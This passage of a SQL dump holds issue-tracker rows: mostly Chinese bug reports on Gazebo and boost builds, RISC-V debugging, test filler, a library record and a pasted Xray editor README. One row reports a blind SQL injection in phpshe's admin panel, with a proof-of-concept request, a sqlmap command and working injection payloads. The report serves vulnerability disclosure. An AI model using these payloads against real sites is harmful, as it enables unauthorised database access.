15:49:52','2019-03-05',0,NULL,NULL,43,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(44,1,130,' Gazebo-exercise安装出现的一些问题反馈','\n问题1: 在运行demo的时候,有时候成功有时候会断,出现图中错误,是不是跟上次安装boost有关\n问题2:按照源码重新安装后,在运行成功我们这边的demo的时候在界面上有卡顿现象,原版的时候没有出现卡顿\n问题3:见问题汇总附件',NULL,NULL,1,NULL,2,NULL,43,'2019-04-17 10:07:15','2019-04-17 17:36:14','2019-04-17',0,NULL,NULL,44,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(45,1,130,'运行rosflight固定翼无人机仿真时,大概率出现仿真异常中断现象','基于rosflight固定翼无人机案例进行gazebo仿真时,大概率出现仿真异常中断现象,如图所示。',NULL,NULL,1,NULL,2,NULL,26,'2019-04-17 13:19:30','2019-04-18 17:13:41','2019-04-17',0,NULL,NULL,45,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(46,2,130,'关于在该模块提交问题的一些说明','为了更高效、便捷地解决大家遇到的问题,请在此模块提交帖子时:\n1. 用准确的术语把问题描述清楚;\n2. 配上必要的说明,如问题产生的背景、出现问题时的现场,尽量用**文本格式**,编辑器本身有强大的代码块插入功能,如下面示例代码所示:\n```cpp\nnamespace gazebo\n{\nAircraftForcesAndMoments::~AircraftForcesAndMoments()\n}\n```\n3. 确有必要,可以适当添加图片或附件。',NULL,NULL,1,NULL,5,NULL,26,'2019-04-17 14:23:09','2019-04-17 14:25:35','2019-04-17',0,NULL,NULL,46,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(47,1,130,'Gazebo-exercise安装过程异常','Gazebo-exercise在编译过程中出现/usr/include/boost/type_traits/detail/has_binary_operator.hpp:50:Parse error at “BOOST_JOIN”编译时错误(详情见附件)',NULL,NULL,1,NULL,2,NULL,26,'2019-04-18 17:52:48','2019-04-18 17:57:30','2019-04-18',0,NULL,NULL,47,1,2,0,NULL,4,NULL,NULL,NULL,0,NULL,NULL,NULL),(48,1,130,'Gazebo-exercise编译时出现parser.cc:22:44:fatal error: ignition/math/SemanticVersion.hh: 没有那个文件或目录错误','Gazebo-exercise在编译过程中出现如附件所示parser.cc:22:44:fatal error: ignition/math/SemanticVersion.hh: 没有那个文件或目录编译错误。',NULL,NULL,1,NULL,2,NULL,26,'2019-04-29 11:20:03','2019-04-29 11:25:08','2019-04-29',0,NULL,NULL,48,1,2,0,NULL,5,NULL,NULL,NULL,0,NULL,NULL,NULL),(49,1,130,'Gazebo-exercise编译过程中出现Event.hh:41:32: fatal error: boost/threadpool.hpp: 没有那个文件或目录','Gazebo-exercise编译过程中出现如附件所示Event.hh:41:32: fatal error: boost/threadpool.hpp: 没有那个文件或目录编译错误',NULL,NULL,1,NULL,2,NULL,26,'2019-04-29 11:30:13','2019-04-29 11:33:05','2019-04-29',0,NULL,NULL,49,1,2,0,NULL,6,NULL,NULL,NULL,0,NULL,NULL,NULL),(50,1,130,'安装Gazebo-exercise后,运行gazebo仿真出现随机崩溃或提示libGL error: failed to create drawable错误','运行Gazebo仿真时,出现程序随机崩溃或提示如附件所示libGL error: failed to create drawable错误',NULL,NULL,1,NULL,2,NULL,26,'2019-04-29 11:42:43','2019-08-14 14:35:38','2019-04-29',0,NULL,NULL,50,1,2,0,NULL,7,NULL,NULL,NULL,0,NULL,NULL,NULL),(51,1,128,'界面流转','啊啊啊',NULL,NULL,1,NULL,2,NULL,46,'2019-08-08 08:48:02','2019-08-08 08:48:02','2019-08-08',0,NULL,NULL,51,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(52,1,134,'自动控制系统出现问题','紧急维护',NULL,NULL,1,NULL,2,NULL,49,'2019-08-08 15:34:53','2019-08-08 15:34:53','2019-08-08',0,NULL,NULL,52,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(53,1,134,'页面出现乱码','页面出现乱码页面出现乱码页面出现乱码',NULL,NULL,1,NULL,2,NULL,50,'2019-08-13 16:32:01','2019-08-13 16:32:01','2019-08-13',0,NULL,NULL,53,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(54,1,133,'界面流转','界面在转换时对于错误信息,应当给予友好的提示!',NULL,NULL,1,NULL,2,NULL,46,'2019-08-14 08:17:58','2019-08-14 08:17:58','2019-08-14',0,NULL,NULL,54,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(55,1,141,'测试的issue问题','测试的issue问题测试的issue问题','2019-08-20',NULL,1,NULL,2,NULL,50,'2019-08-16 09:24:33','2019-08-24 14:51:21','2019-08-16',0,30,NULL,55,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(56,1,144,'控制出现BUG','',NULL,NULL,1,NULL,2,NULL,50,'2019-08-23 15:09:37','2019-08-23 15:09:37','2019-08-23',0,NULL,NULL,56,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(57,1,141,'dfadsfas','dasdva\n',NULL,NULL,1,NULL,2,NULL,50,'2019-09-02 08:56:25','2019-09-02 08:56:25','2019-09-02',0,NULL,NULL,57,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(59,1,155,'主页图片错误','图片不显示',NULL,NULL,1,50,2,NULL,20,'2019-10-08 10:44:52','2019-10-08 10:44:52','2019-10-08',0,NULL,NULL,59,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(62,1,169,'没有修复bug','漏掉了bug',NULL,NULL,1,NULL,2,NULL,46,'2019-10-23 16:14:16','2019-10-23 16:54:49','2019-10-23',100,NULL,NULL,62,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(63,1,169,'我以不同身份登录,点击消息通知,会出现白屏','我以DavidLi登录,身份是管理员,消息通知都正常。但是我换成1,即15633333333,登录,身份也是管理员,但是点击消息通知会出现白屏。\n开始网页链接http://210.79.227.194/users/p51497208/\n白屏网页链接\nhttp://210.79.227.194/users/p51497208/user_tidings',NULL,NULL,1,NULL,2,NULL,49,'2019-10-23 16:45:23','2019-10-23 16:46:50','2019-10-23',0,NULL,NULL,63,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(64,1,188,'系统安装过程异常。','问题1: 在运行demo的时候,有时候成功有时候会断,出现图中错误,是不是跟上次安装boost有关;问题2:按照源码重新安装后,在运行成功我们这边的demo的时候在界面上有卡顿现象,原版的时候没有出现卡顿;',NULL,NULL,1,NULL,2,NULL,61,'2019-10-31 16:54:19','2019-10-31 17:00:14','2019-10-31',0,NULL,NULL,64,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(65,1,188,'priv 寄存器不可写 ','priv 寄存器不可写,应该修复该问题。',NULL,NULL,1,NULL,2,NULL,46,'2019-10-31 16:57:23','2019-10-31 17:00:59','2019-10-31',0,NULL,NULL,65,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(66,2,188,'接收 target 串口数据,以 ‘O XX...’ 响应传输到 GDB ','无',NULL,NULL,1,NULL,2,NULL,46,'2019-10-31 17:02:37','2019-10-31 17:02:37','2019-10-31',0,NULL,NULL,66,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(67,1,188,'编译过程中出现如附件所示Event.hh:41:32: fatal error: boost/threadpool.hpp: 没有那个文件或目录编译错误。','项目代码在编译过程中出现如附件所示Event.hh32: fatal error: boost/threadpool.hpp: 没有那个文件或目录编译错误,请各位同事给予解决帮助。',NULL,NULL,3,NULL,2,NULL,61,'2019-10-31 17:02:39','2019-10-31 17:05:53','2019-10-31',100,NULL,NULL,67,1,2,0,NULL,4,NULL,NULL,NULL,0,NULL,NULL,NULL),(68,1,188,'riscv-prober 增加 abstractauto 的检测','只有 target 支持 abstractauto,才能加速 GPRs 和内存的读取。',NULL,NULL,1,NULL,2,NULL,46,'2019-10-31 17:04:30','2019-10-31 17:05:24','2019-10-31',0,NULL,NULL,68,1,2,0,NULL,5,NULL,NULL,NULL,0,NULL,NULL,NULL),(69,1,192,'riscv-prober应该增加 abstractauto 的检测','只有 target 支持 abstractauto,才能加速 GPRs 和内存的读取。',NULL,NULL,1,NULL,2,NULL,46,'2019-11-06 16:38:25','2019-11-06 16:53:12','2019-11-06',0,NULL,NULL,69,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(70,1,194,'sadfasd','',NULL,NULL,1,NULL,2,NULL,49,'2019-11-07 11:14:16','2019-11-07 11:14:16','2019-11-07',0,NULL,NULL,70,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(71,1,194,'sadfasd','',NULL,NULL,1,NULL,2,NULL,49,'2019-11-07 11:14:16','2019-11-07 11:14:16','2019-11-07',0,NULL,NULL,71,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(72,1,194,'特殊色','测试',NULL,NULL,1,NULL,2,NULL,46,'2019-11-07 11:15:06','2019-11-07 11:15:06','2019-11-07',0,NULL,NULL,72,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(73,1,199,'riscv-prober应该增加 abstractauto 的检测','只有 target 支持 abstractauto,才能加速 GPRs 和内存的读取。',NULL,NULL,3,NULL,2,10,46,'2019-11-07 16:05:58','2019-11-08 14:49:04','2019-11-07',100,NULL,NULL,73,1,2,0,NULL,1,NULL,NULL,NULL,0,NULL,NULL,NULL),(74,1,199,'编译过程中出现如附件所示Event.hh:41:32: fatal error: boost/threadpool.hpp: 没有那个文件或目录编译错误。','项目代码在编译过程中出现如附件所示Event.hh 32: fatal error: boost/threadpool.hpp: 没有那个文件或目录编译错误,请各位同事给予解决帮助。','2019-11-08',NULL,1,NULL,2,10,64,'2019-11-07 16:21:16','2019-11-08 14:36:34','2019-11-07',100,6,NULL,74,1,2,0,NULL,2,NULL,NULL,NULL,0,NULL,NULL,NULL),(75,2,199,'Kernel errors on loading modules #152','当我在网络接口模块中添加代码,进行编译后,出现下面错误:\n$ sudo modprobe openvswitch\nmodprobe: ERROR: could not insert \'openvswitch\': Invalid argument\n[ 69.716000] openvswitch: target ffffffe000033720 can not be addressed by the 32-bit offset from PC = 000000002964b5db','2019-09-06',NULL,3,49,3,11,65,'2019-09-05 16:17:51','2019-11-08 11:44:16','2019-09-05',100,12,NULL,75,1,2,0,NULL,3,NULL,NULL,NULL,0,NULL,NULL,NULL),(76,1,199,'实现三串口后,Windows 7 蓝屏','',NULL,NULL,3,NULL,2,11,63,'2019-09-06 16:17:51','2019-11-08 14:37:02','2019-09-06',100,NULL,NULL,76,1,2,0,NULL,4,NULL,NULL,NULL,0,NULL,NULL,NULL),(77,1,199,'priv 寄存器不可写','',NULL,NULL,3,NULL,4,11,65,'2019-09-07 16:17:51','2019-11-08 14:37:25','2019-09-07',100,NULL,NULL,77,1,2,0,NULL,5,NULL,NULL,NULL,0,NULL,NULL,NULL),(78,2,199,'我安装了 hikyuu 1.0.5 版本。 当我运行hikyuu_example Demo1的时候,出现如下错误,请帮忙看看是哪里的问题?','AttributeError Traceback (most recent call last)\nin ()\n1 q = QueryByDate(start_date, end_date, kType=Query.DAY)\n----> 2 my_sys.run(stk, q)\n3\n4 #将交易记录及持仓情况,保存在临时目录,可用Excel查看\n5 #临时目录一般设置在数据所在目录下的 tmp 子目录\n\nin _getBuyNumber(self, datetime, stk, price, risk)\n14\n15 def _getBuyNumber(self, datetime, stk, price, risk):\n---> 16 tm = self.getTM()\n17 cash = tm.currentCash\n18\n\nAttributeError: \'DEMO_MM\' object has no attribute \'getTM\'',NULL,NULL,1,NULL,3,11,64,'2019-09-08 16:17:51','2019-11-08 14:37:46','2019-09-08',100,NULL,NULL,78,1,2,0,NULL,6,NULL,NULL,NULL,0,NULL,NULL,NULL),(79,4,199,'变更 memory-map 的传递形式 ','target 提供存储器映射数据结构,gdb server 将其转化成 xml。',NULL,NULL,1,NULL,1,11,63,'2019-09-09 16:17:51','2019-11-08 14:38:08','2019-09-09',100,NULL,NULL,79,1,2,0,NULL,7,NULL,NULL,NULL,0,NULL,NULL,NULL),(80,2,199,'这个自定义策略命中了,为什么还是pass?','{\n\"success\": true,\n\"msg\": \"\",\n\"code\": \"100\",\n\"data\": {},\n\"abstractions\": {\n\"tran_did_1_day_qty\": 1,\n\"tran_did_ip_1_day_qty\": 0,\n\"tran_uid_ip_1_day_qty\": 2,\n\"tran_uid_1_hour_amt\": 400.0,\n\"tran_ip_1_hour_qty\": 5,\n\"tran_ip_1_day_amt\": 500.0,\n\"tran_ip_10_min_amt\": 500.0,\n\"tran_ip_1_hour_amt\": 500.0,\n\"tran_uid_1_day_amt\": 400.0,\n\"tran_did_10_min_qty\": 1,\n\"abstraction_475\": 3,\n\"tran_did_1_hour_qty\": 1,\n\"tran_ip_1_day_qty\": 5,\n\"tran_ip_10_min_qty\": 5,\n\"tran_uid_10_min_amt\": 400.0\n},\n\"adaptations\": null,\n\"activations\": {\n\"transaction_exception\": {\n\"risk\": \"pass\",\n\"score\": 23\n}\n},\n\"hitsDetail\": {\n\"transaction_exception\": [\n{\n\"key\": \"388\",\n\"value\": 23.0,\n\"desc\": \"1天内手机关联设备数大于1\"\n}\n]\n},\n\"respTimes\": {\n\"adaptations\": 0,\n\"activations\": 1,\n\"abstractions\": 216\n}\n}',NULL,NULL,1,NULL,2,11,64,'2019-09-10 16:17:51','2019-11-08 14:38:27','2019-09-10',100,NULL,NULL,80,1,2,0,NULL,8,NULL,NULL,NULL,0,NULL,NULL,NULL),(81,2,199,'请教复杂的json处理','比方{\n\"success\": true,\n\"msg\": \"\",\n\"code\": \"100\",\n\"data\": {},\n\"abstractions\": {\n\"tran_did_1_day_qty\": 1, // 特征 指标的计算结果,方便大家调试和核对\n\"tran_did_ip_1_day_qty\": 0,\n\"tran_uid_ip_1_day_qty\": 1,\n\"tran_uid_1_hour_amt\": 500.0,\n\"tran_ip_1_hour_qty\": 1,\n\"tran_ip_1_day_amt\": 500.0,\n\"tran_ip_10_min_amt\": 500.0,\n\"tran_ip_1_hour_amt\": 500.0,\n\"tran_uid_1_day_amt\": 500.0,\n\"tran_did_10_min_qty\": 1,\n\"tran_did_1_hour_qty\": 1,\n\"tran_ip_1_day_qty\": 1,\n\"tran_ip_10_min_qty\": 1,\n\"tran_uid_10_min_amt\": 500.0\n},\n\"adaptations\": null,\n\"activations\": {\n\"transaction_exception\": {\n\"risk\": \"pass\", // 风险级别:pass 通过, reject 拒绝, review 人工审核\n\"score\": 0 //风险积分\n}\n},\n\"hitsDetail\": {\n\"transaction_exception\": [] // 具体命中的规则项\n},\n\"respTimes\": { // 各模块耗时情况\n\"adaptations\": 0,\n\"activations\": 0,\n\"abstractions\": 31\n}\n}这样的数据是进入的字段数据,如何抽取啊',NULL,NULL,1,NULL,2,11,64,'2019-09-11 16:17:51','2019-11-08 14:40:39','2019-09-11',100,NULL,NULL,81,1,2,0,NULL,9,NULL,NULL,NULL,0,NULL,NULL,NULL),(82,3,199,'测试:Windows + Eclipse + GNU MCU Eclipse 插件','Windows 环境下使用标准 Eclipse CDT + GNU MCU Eclipse 插件进行测试。测试过程中记录文档,要写使用说明。',NULL,NULL,1,NULL,2,NULL,49,'2019-09-12 16:17:51','2019-11-08 14:41:09','2019-09-12',100,NULL,NULL,82,1,2,0,NULL,10,NULL,NULL,NULL,0,NULL,NULL,NULL),(83,1,199,'203-The Art Of Critical Decision Making-copy CDs','Personal Author:\n\nRoberto, Michael A.\n\nTitle All:\n\nThe art of critical decision making [sound recording] / Michael A. Roberto.\nMaking high-stakes decisions --\nCognitive biases --\nAvoiding decision-making traps --\nFraming : risk or opportunity? --\nIntuition : recognizing patterns --\nReasoning by analogy --\nMaking sense of ambiguous situations --\nThe wisdom of crowds? --\nGroup thinking : thinking or conforming? --\nDeciding how to decide --\nStimulating conflict and debate --\nKeeping conflict constructive.\nCreativity and brainstorming --\nThe curious inability to decide --\nProcedural justice --\nAchieving closure through small wins --\nNormal accident theory --\nNormalizing deviance --\nAllison\'s model : three lenses --\nPractical drift --\nAmbiguous threats and the recovery window --\nConnecting the dots --\nSeeking out problems --\nAsking the right questions.\nGreat courses (Compact disc)\n\nAuthor:\n\nRoberto, Michael A.\n\nLocal Call Number:\n\nN658.4\n\nISBN:\n\n9781598035384\n\nPublication Information:\n\nChantilly, VA : Teaching Co. ; c2009.\n\nPhysical Description:\n\n12 sound discs (12 hr) : digital ; 4 3/4 in. + 1 course guidebook.\n\nSeries:\n\nThe great courses\nGreat courses (Compact disc)\n\nContents:\n\nMaking high-stakes decisions -- Cognitive biases -- Avoiding decision-making traps -- Framing : risk or opportunity? -- Intuition : recognizing patterns -- Reasoning by analogy -- Making sense of ambiguous situations -- The wisdom of crowds? -- Group thinking : thinking or conforming? -- Deciding how to decide -- Stimulating conflict and debate -- Keeping conflict constructive.\nCreativity and brainstorming -- The curious inability to decide -- Procedural justice -- Achieving closure through small wins -- Normal accident theory -- Normalizing deviance -- Allison\'s model : three lenses -- Practical drift -- Ambiguous threats and the recovery window -- Connecting the dots -- Seeking out problems -- Asking the right questions.\n\nSubject Term:\n\nDecision making.\nCritical thinking.\n\nGenre:\n\nAudiobooks.\n\nHolds: 0',NULL,NULL,3,NULL,2,NULL,64,'2019-09-13 16:17:51','2019-11-08 14:44:36','2019-09-13',100,NULL,NULL,83,1,2,0,NULL,11,NULL,NULL,NULL,0,NULL,NULL,NULL),(84,4,199,'I found a blind SQL injection in the background','1.admin index.php\nindex\n\n2.vulnerability point\npoint\n\n3.code\ncode\n\n4.capture the cap\ncap\n\n5.sql injection test\ntest\n\npoc:\n\nGET /phpshe/admin.php?mod=order&state=&id=1&user_tname=1&user_phone=1&date1=2018-12-26&date2= HTTP/1.1\nHost: 192.3.221.177\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nReferer: http://192.3.221.177/phpshe/admin.php?mod=order\nCookie: deviceid=1545098043964; PHPSESSID=d7860vsq3q03c2pvmvc798tt64\nConnection: close\nsqlmap command:\nPython sqlmap.py -r 1.txt --level=3 --risk=2 --dbms=mysql --batch -p \"user_phone\"\n\ninjection type:\n\n---\nParameter: user_phone (GET)\n Type: boolean-based blind\n Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY\n clause\n Payload: mod=order&state=&id=1&user_tname=1&user_phone=1\' RLIKE (SELECT (CAS\nE WHEN (4784=4784) THEN 1 ELSE 0x28 END))-- EfBd&date1=2018-12-26&date2=\n\n\n Type: AND/OR time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: mod=order&state=&id=1&user_tname=1&user_phone=1\' AND (SELECT * FROM\n (SELECT(SLEEP(5)))hxbT)-- YEPD&date1=2018-12-26&date2=\n---',NULL,NULL,3,NULL,2,NULL,64,'2019-09-14 16:17:51','2019-11-08 14:50:38','2019-09-18',100,NULL,NULL,84,1,2,0,NULL,12,NULL,NULL,NULL,0,NULL,NULL,NULL),(85,1,199,'CSR 缺少 mcountinhibit ','mcountinhibit 是标准的 CSR,应该支持。',NULL,NULL,3,NULL,2,NULL,63,'2019-09-18 16:17:51','2019-11-08 11:43:04','2019-09-20',100,NULL,NULL,85,1,2,0,NULL,13,NULL,NULL,NULL,0,NULL,NULL,NULL),(86,5,199,'Xray 能否流畅性超越 Atom','Xray是Atom原版人马使用RUST语言编写的Atom项目, 效率从火狐浏览器团队(RUST开发团队)可看出\nXray is an experimental Electron-based text editor informed by what\nwe\'ve learned in the four years since the launch of Atom. In the short\nterm, this project is a testbed for rapidly iterating on several radical\nideas without risking the stability of Atom. The longer term future of\nthe code in this repository will become clearer after a few months of\nprogress. For now, our primary goal is to iterate rapidly and learn as\nmuch as possible.\nUpdates\nMarch 5, 2018\nFoundational priorities\nOur goal is to build a cross-platform text editor that is designed\nfrom the beginning around the following foundational priorities:\n\nHigh performance\nXray feels lightweight and responsive.\n\nWe design our features to be responsive from the beginning. We\nreliably provide visual feedback within the latency windows suggested by\nthe RAIL performance model. For all interactions, we shoot for the following targets on the hardware of our median user:\n\nDuration\nAction\n\n8ms\nScrolling, animations, and fine-grained interactions such as typing or cursor movement.\n\n50ms\nCoarse-grained interactions such as opening a file or initiating a\nsearch. If we can\'t complete the action within this window, we should\nshow a progress bar.\n\n150ms\nOpening an application window.\n\nWe are careful to maximize throughput of batch operations such as\nproject-wide search. Memory consumption is kept within a low constant\nfactor of the size of the project and open buffer set, but we trade\nmemory for speed and extensibility so long as memory requirements are\nreasonable.\n\nCollaboration\nXray makes it as easy to code together as it is to code alone.\n\nWe design features for collaborative use from the beginning. Editors\nand other relevant UI elements are designed to be occupied by multiple\nusers. Interactions with the file system and other resources such as\nsubprocesses are abstracted to work over network connections.\n\nExtensibility\nXray gives developers control over their own tools.\n\nWe expose convenient and powerful APIs to enable users to add\nnon-trivial functionality to the application. We balance the power of\nour APIs with the ability to ensure the responsiveness, stability, and\nsecurity of the application as a whole. We avoid leaking implementation\ndetails and use versioning where possible to enable a sustained rapid\ndevelopment without destabilizing the package ecosystem.\n\nWeb compatibility\nEditing on GitHub feels like editing in Xray.\n\nWe provide a feature-rich editor component that can be used on the\nweb and within other Electron applications. This will ultimately help us\nprovide a more unified experience between GitHub.com and this editor\nand give us a stronger base of stakeholders in the core editing\ntechnology. If this forces serious performance compromises we may\npotentially drop this objective, but we don\'t think that it will.\n\nArchitecture\nMartin Fowler defines software architecture those decisions which are\nboth important and hard to change. Since these decisions are hard to\nchange, we need to be sure that our foundational priorities are\nwell-served by these decisions.\n\nThe UI is built with Electron\nElectron adds a lot of overhead, which detracts from our top priority\nof high-performance. However, Electron is also the best approach that\nwe know of to deliver a cross-platform, extensible user interface. Atom\nproved that developers want to add non-trivial UI elements to their\neditor, and we still see web technologies as the most viable way to\noffer them that ability. We also want to provide extension authors with a\nscripting API, and the JavaScript VM that ships with Electron is well\nsuited to that task.\n\nThe fundamental question is whether we can gain Electron\'s benefits\nfor extensibility while still meeting our desired performance goals. Our\nhypothesis is that it\'s possible–with the right architecture.\n\nCore application logic is written in Rust\nThe core of the application is implemented in a pure Rust crate (/xray_core) and made accessible to JavaScript through N-API bindings (/xray_node). This module is loaded into the Electron application (/xray_electron)\nvia Node\'s native add-on system. The binding layer will be responsible\nfor exposing a thread-safe API to JS so that the same native module can\nbe used in the render thread and worker threads.\n\nAll of the core application code other than the view logic should be\nwritten in Rust. This will ensure that it has a minimal footprint to\nload and execute, and Rust\'s robust type system will help us maintain it\nmore efficiently than dynamically typed code. A language that is\nfundamentally designed for multi-threading will also make it easier to\nexploit parallelism whenever the need arises, whereas JavaScript\'s\nsingle-threaded nature makes parallelism awkward and challenging.\n\nFundamentally, we want to spend our time writing in a language that\nis fast by default. It\'s true that it\'s possible to write slow Rust also\npossible to write fast JavaScript. It\'s also true that it\'s\nmuch harder to write slow Rust than it is to write slow JavaScript. By\nspending fewer resources on the implementation of the platform itself,\nwe\'ll make more resources available to run package code.\n\nPackages will run primarily in worker threads\nA misbehaving package should not be able to impact the responsiveness\nof the application. The best way to guarantee this while preserving\nease of development is to activate packages on worker threads. We can do\na worker thread per package or run packages in their own contexts\nacross a pool of threads.\n\nPackages can run code on the render thread by specifying versioned components in their package.json.\n\n\"components\": {\n\"TodoList\": \"./components/todo-list.js\"\n}\n\nIf a package called my-todos had the above entry in its package.json, it could request that the workspace attach that component by referring to myTodos.TodoList\nwhen adding an item. On package installation, we can automatically\nupdate the V8 snapshot to include the components of every installed\npackage. Components will only be dynamically loaded from the provided\npaths in development mode.\n\nAPIs for interacting with the core application state and the\nunderlying operating system will only be available within worker\nthreads, discouraging package authors from putting too much logic into\ntheir views. We\'ll use a combination of asynchronous channels and CRDTs\nto present convenient APIs to package authors within worker threads.\n\nText is stored in a copy-on-write CRDT\nTo fully exploit Rust\'s unique advantage of parallelism, we need to\nstore text in a concurrency-friendly way. We use a variant of RGA called\nRGASplit, which is described in this research paper.\n\nIn RGA split, the document is stored as a sequence of insertion\nfragments. In the example above, the document starts as just a single\ninsertion containing hello world. We then introduce , there and ! as additional insertions, splitting the original insertion into two fragments. To delete the ld at the end of world in the third step, we create another fragment containing just the ld and mark it as deleted with a tombstone.\n\nStructuring the document in this way has a number of advantages.\n\nReal-time collaboration works out of the boxConcurrent edits: Any thread can read or write its own replica of\nthe document without diverging in the presence of concurrent edits.Integrated non-linear history: To undo any group of operations, we\nincrement an undo counter associated with any insertions and deletions\nthat controls their visibility. This means we only need to store\noperation ids in the history rather than operations themselves, and we\ncan undo any operation at any time rather than adhering to historical\norder.Stable logical positions: Instead of tracking the location of\nmarkers on every edit, we can refer to stable positions that are\nguaranteed to be valid for any future buffer state. For example, we can\nmark the positions of all search results in a background thread and\ncontinue to interpret them in a foreground thread if edits are performed\nin the meantime.\nOur use of a CRDT is similar to the Xi editor, but the approach we\'re\nexploring is somewhat different. Our current understanding is that in\nXi, the buffer is stored in a rope data structure, then a secondary\nlayer is used to incorporate edits. In Xray, the fundamental storage\nstructure of all text is itself a CRDT. It\'s similar to Xi\'s rope in\nthat it uses a copy-on-write B-tree to index all inserted fragments, but\nit does not require any secondary system for incorporating edits.\n\nDerived state will be computed asynchronously\nWe should avoid implementing synchronous APIs that depend on\nopen-ended computations of derived state. For example, when soft\nwrapping is enabled in Atom, we synchronously update a display index\nthat maps display coordinates to buffer coordinates, which can block the\nUI.\n\nIn Xray, we want avoid making these kinds of promises in our API. For\nexample, we will allow the display index to be accessed synchronously\nafter a buffer edit, but only provide an interpolated version of its\nstate that can be produced in logarithmic time. These means it will be\nspatially consistent with the underlying buffer, but may contain lines\nthat have not yet been soft-wrapped.\n\nWe can expose an asynchronous API that allows a package author to\nwait until the display layer is up to date with a specific version of\nthe buffer. In the user interface, we can display a progress bar for any\nderived state updates that exceed 50ms, which may occur when the user\npastes multiple megabytes of text into the editor.\n\nSystem interaction will be centralized in a \"workspace server\"\nFile system interactions will be routed through a central server called the workspace server.\n\nThe server will serialize buffer loads and saves on a per-path basis,\nand maintains a persistent database of CRDT operations for each file.\nAs edits are performed in windows, they will be streamed to the host\nprocess to be stored and echoed out to any other windows with the same\nopen buffer. This will enable unsaved changes to always be incrementally\npreserved in case of a crash or power failure and preserves the history\nassociated with a file indefinitely.\n\nEarly on, we should design the application process to be capable of\nconnecting to multiple workspace servers to facilitate real-time\ncollaboration or editing files on a remote server by running a headless\nhost process. To support these use cases, we should prefer implementing\nmost code paths that touch the file system or spawn subprocesses in the\nhost process and interacting with them via RPC.\n\nReact will be used for presentation\nBy using React, we completely eliminate the view framework as a\nconcern that we need to deal with and give package authors access to a\ntool they\'re likely to be familiar with. We also raise the level of\nabstraction above basic DOM APIs. The risk of using React is of course\nthat it is not standardized and could have breaking API changes. To\nmitigate this risk, we will require packages to declare which version of\nReact they depend on. We will attempt use this version information to\nprovide shims to older versions of React when we upgrade the bundled\nversion. When it\'s not possible to shim breaking changes, we\'ll use the\nversion information to present a warning.\n\nStyling will be specified in JS\nCSS is a widely-known and well-supported tool for styling user\ninterfaces, which is why we embraced it in Atom. Unfortunately, the\nperformance and maintainability of CSS degrade as the number of\nselectors increases. CSS also lacks good tools for exposing a versioned\ntheming APIs and applying programmatic logic such as altering colors.\nFinally, the browser does not expose APIs for being notified when\ncomputed styles change, making it difficult to use CSS as a source of\ntruth for complex components. For a theming system that performs well\nand scales, we need more direct control. We plan to use a CSS-in-JS\napproach that automatically generates atomic selectors so as to keep our\ntotal number of selectors minimal.\n\nText is rendered via WebGL\nIn Atom, the vast majority of computation of any given frame is spent\nmanipulating the DOM, recalculating styles, and performing layout. To\nachieve good text rendering performance, it is critical that we bypass\nthis overhead and take direct control over rendering. Like Alacritty and\nXi, we plan to employ OpenGL to position quads that are mapped to glyph\nbitmaps in a texture atlas.\n\nWe plan to use HarfBuzz to determine an accurate mapping between\ncharacter sequences and glyphs, since one character does not always\ncorrespond to one glyph. Once we identify clusters of characters\ncorresponding to glyphs, we\'ll rasterize glyphs via an HTML 5 canvas to\nensure we use the appropriate text rasterization method for the current\nplatform, then upload them to the texture atlas on the GPU to be\nreferenced in shaders.\n\nBypassing the DOM means that we\'ll need to implement styling and text\nlayout ourselves. That is a high price to pay, but we think it will be\nworth it to bypass the performance overhead imposed by the DOM.\n\nDevelopment process\nExperiment\nAt this phase, this code is focused on learning. Whatever code we\nwrite should be production-quality, but we don\'t need to support\neverything at this phase. We can defer features that don\'t contribute\nsubstantially to learning.\n\nDocumentation-driven development\nBefore coding, we ask ourselves whether the code we\'re writing can be\nmotivated by something that\'s written in the guide. The right approach\nhere will always be a judgment call, but lets err on the side of\ntransparency and see what happens. See About this guide for more details.\n\nDisciplined monorepo\nAll code related to Xray should live in this repository, but\nintra-repository dependencies should be expressed in a disciplined way\nto ensure that a one-line docs change doesn\'t require us to rebuild the\nworld. Builds should be finger-printed on a per-component basis and we\nshould aim to keep components granular.\n\nCommunity SLA\nWell-formulated PRs and issues will receive some form of response by\nthe end of the next business day. If this interferes with our ability to\nlearn, we revisit.\n\nQ1 2018 Roadmap\nThe primary goal of the next three months is to validate the key\nideas presented in this document and to get a sense for how long the\nenvisioned system might take to develop. That\'s a pretty abstract goal,\nhowever.\n\nMore concretely, our goal is to ship a high-performance standalone\neditor component suitable for use in any web application, something we\ncould eventually use on GitHub.com. This standalone editor will give us a\nchance to test a limited set of critical features in production\nscenarios without building out an entire desktop-based editor. We plan\nto develop this new 